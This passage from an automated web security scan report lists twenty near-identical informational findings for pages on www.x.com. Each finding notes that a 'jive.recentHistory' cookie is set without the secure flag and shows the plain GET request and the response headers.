Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.106. https://www.x.com/docs/DOC-1551  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.107. https://www.x.com/docs/DOC-1613  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.108. https://www.x.com/docs/DOC-2241  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.109. https://www.x.com/docs/DOC-2346  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.110. https://www.x.com/docs/DOC-3201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.111. https://www.x.com/docs/DOC-3212  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.112. https://www.x.com/docs/DOC-3251  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.113. https://www.x.com/docs/DOC-3271  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.114. https://www.x.com/docs/DOC-3321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.115. https://www.x.com/docs/DOC-3322  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.116. https://www.x.com/docs/DOC-3323  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.117. https://www.x.com/docs/DOC-3345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.118. https://www.x.com/docs/DOC-3351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.119. https://www.x.com/docs/DOC-3352  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.120. https://www.x.com/docs/DOC-3353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.121. https://www.x.com/docs/DOC-3354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.122. https://www.x.com/docs/DOC-3355  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.123. https://www.x.com/docs/DOC-3371  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.124. https://www.x.com/docs/DOC-3372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.125. https://www.x.com/docs/DOC-3373  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

